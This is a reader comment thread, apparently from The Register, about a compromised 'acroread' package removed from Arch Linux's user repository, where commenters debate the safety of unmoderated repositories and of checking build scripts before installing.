back to article Arch Linux PDF reader package poisoned

Arch Linux has pulled a user-provided AUR (Arch User Repository) package, because it contained malware. If you're an Arch Linux user who downloaded a PDF viewer named "acroread" in the short time it was compromised, you'll need to delete it. While the breach isn't regarded as serious, it sparked a debate about the security of …

  1. John Smith 19 Gold badge
    Unhappy

    If you leave stuff by the side of the information superhighway someone will pick it up.

    Who knew?

  2. Drigg

    ArchLinux AUR

    As an Arch user I am well aware of the potential dangers in installing software from the user maintained repo (AUR), and I would hope that this is the case for other users too. It's pretty simple to check the installation script before running it. The advantages of having access to this repo, outweigh the dangers; it just needs using with respect.

    In general, any non-moderated repos offer this risk, it certainly is not limited to Arch.

  3. i1ya
    WTF?

    What, you want me to stop building packages as root using AUR helpers?

    And reading every pkgbuild file? Sure, it will be more fun than reading every EULA for non-free software.

    But, jokes aside, I think that some malicious code can be successfully obfuscated to look more innocent to average lazy folk like me.

    1. Waseem Alkurdi

      Re: What, you want me to stop building packages as root using AUR helpers?

      But, jokes aside, I think that some malicious code can be successfully obfuscated to look more innocent to average lazy folk like me.

      Just like what he did here. He put the malicious code in a script retrieved from the Internet.

      What if you have a package that retrieves "additional data" from the Internet, not only a script?

      Like a game retrieving its assets for example.

      Should every single byte it downloads be checked?

  4. FlamingDeath Silver badge
    Facepalm

    The internet

    Was a far better place in the 90's

    Then the masses of muppets came, and with them, the sociopaths

    1. hmv

      Re: The internet

      The Morris worm was in 1988, and there were certain many bad actors in the 1990s - my introduction to security was finding out why an AlphaServer 2100 was running a bit slow, and discovering it was riddled with nasty stuff.

  5. Anonymous Coward
    Anonymous Coward

    A dodgy acroread package? I'm shocked, I tell you!

    A dodgy acroread package? It sounds as though it has replicated the functionality of the Adobe original quite accurately...

    1. Anonymous Coward
      Anonymous Coward

      Re: A dodgy acroread package? I'm shocked, I tell you!

      No no, given the number of bugs fixed today, Adobe developers are masters of dodgy code. This one is a lame one, like many wannabe Linux developers...

      1. Mr_E
        Holmes

        Re: A dodgy acroread package? I'm shocked, I tell you!

        Re: A dodgy acroread package? I'm shocked, I tell you!

        No no, given the number of bugs fixed today, Adobe developers are masters of dodgy code. This one is a lame one, like many wannabe ̶L̶i̶n̶u̶x̶ developers...<

        ---

        Fixed!

  6. Christian Berger

    To contrast that...

    I have seen multiple Windows users looking for software by going to google and typing "$product free download" into it...

    Yes, that's apparently still the norm for large numbers of people. BTW if you come across one of those, tell them to go to the Wikipedia page for that product (yes there are still people not knowing Wikipedia) and tell them to follow the link to the website of the manufacturer. That's much better security wise. (though not perfect)

  7. GnuTzu
    Alert

    Thank Goodness it's Not One of the "Major" Distributions

    I don't know how many Arch servers there are out there; and thankfully, this was not a server package.

    We have seriously got to protect the repos!!! PERIOD!!!

    I'll leave it up to others to elaborate.

    1. Niarbeht

      Re: Thank Goodness it's Not One of the "Major" Distributions

      This wasn't a main repository. It's an external repository for user-submitted software. Users have to either:

      A) Download the build file for manually and follow some steps to build the software

      or

      B) Install an extra package manager to automate performing A.

      I still think there are some interesting lessons to be learned here, though. It might be useful for AUR pages and AUR helpers to highlight when there's been a maintainer change, or allow you to easily view the diff for the build file. I know that that information is currently available on the AUR pages themselves, but making it super obvious when changes like that have occurred would be helpful.

  8. Anonymous Coward
    Anonymous Coward

    Butt butt Lunix is secure! Windoze Micro$oft blah blah blah...

    1. Anonymous Coward
      Anonymous Coward

      "Butt butt Lunix is secure!"

      That's quite a statement for an OS that ran on the C64 with TCP/IP support and is no longer maintained.

      1. GnuTzu

        Linux is the Kernal

        I don't remember hearing about the kernel ever being infected. I still worry about the repos--given how automatically an entire system can be updated.

  9. GIRZiM

    Much as I love the AUR (and have successfully made use of lots of packages from it), I've always been a little concerned about it's 'ports' like nature: it's all well and good it being more convenient than downloading a src tarball but I have no idea what it's pulling from those links (knowing that it's getting file abc from site xyz.somewhere doesn't give me any insight into the code itself and for all I know the src files it dumps on my system have nothing in common with what actually gets compiled - how may bits of linked-out code get added without downloading a corresponding patch file?).

    Despite my sense of Gentoo being all hype and no trousers (it's not (B)LFS and setting and forgetting a few compile time switches is not 'compiling your own linux'), I may have to switch to it for peace of mind (just as soon as I can afford a second, identical, system on which to spend all day compiling that is *sigh*).

  10. Anonymous Coward
    Anonymous Coward

    Halo effect

    Don't blame the Arch team for any of this, in fact I give them credit - but inevitably there is a halo around the core distro (any core distro) that extends to anything that is considered "close" to it. So the very fact that AURs start at aur.archlinux.org and not aur.example.com gives AUR an (undeserved) halo of respectability. Yes I know it doesnt deserve it and the page says you try at your own risk. but the halo effect is incredibly strong. Its why people still click on phishing emails from Microsoft Support.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon